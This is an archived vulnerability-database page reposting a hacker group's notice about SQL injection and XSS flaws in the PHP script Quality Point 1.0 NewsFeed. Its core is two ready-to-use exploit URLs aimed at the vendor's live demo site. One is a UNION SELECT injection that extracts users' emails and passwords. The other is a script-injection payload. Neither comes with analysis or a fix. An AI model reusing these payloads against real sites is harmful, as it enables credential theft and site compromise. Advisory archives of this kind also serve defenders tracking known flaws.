|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  World Laboratory of Bugtraq Database |
||||||||||
SecurityAlert : None
Credit : Red-D3v1L Added by : SecurityReason SecurityRisk : Medium  (About) Remote : Yes Local : No Status : Bug
Text : sEc-r1z crEw The Leaders for Penetration Testing In Middle East. ================+ [?] ~ Note : sEc-r1z CrEw# r0x ! ========== [?] Quality Point 1.0 NewsFeed (SQL/XSS) Multiple Remote Vulnerabilities ========== [?] My home: [ http://sec-r1z.com ] [?] For Ask: [r-d@passport.com] [?] Script: [ Quality Point 1.0 ] [?] home Script [ http://qualitypointtech.net ] [?] Language: [ PHP ] [?[ Best WishEs : [ The Love is End ... ] [?] Founder: [ Red-D3v1L ] [?] Gr44tz to: [ sec-r1z# CrEw - Mr.Tro0oqy - r1z - Sas-TerrOrisT And All My Frindes ] ######################################################################## ===[ Exploit SQL ]=== [»]Exploit : path/showPage.php?id=[SQL injection ] [>>] Demo : http://qualitypointtech.net/NewsFeed/showPage.php?id=-348+union+select+1,co ncat%28email,0x3e,version%28%29,0x3e,password%29,3,4,5+from+qualityp_fnt.us ers%20-- ------------ ===[ Exploit XSS ]=== [»]Exploit : showPage.php?id=[XSS] [>>] Demo : http://qualitypointtech.net/NewsFeed/showPage.php?id=%22%3E%3Cscript%3Ealer t%281%29;%3C/script%3E ----------------------- If you want change this note, please use UCP
|
||||||||||
| Alert | ||
Allow attacker to denial of service apache 2.2.17 server |
||
| Apache |  |
|
- 2011-05-13| Copyright © SecurityReason.com. All Rights Reserved. |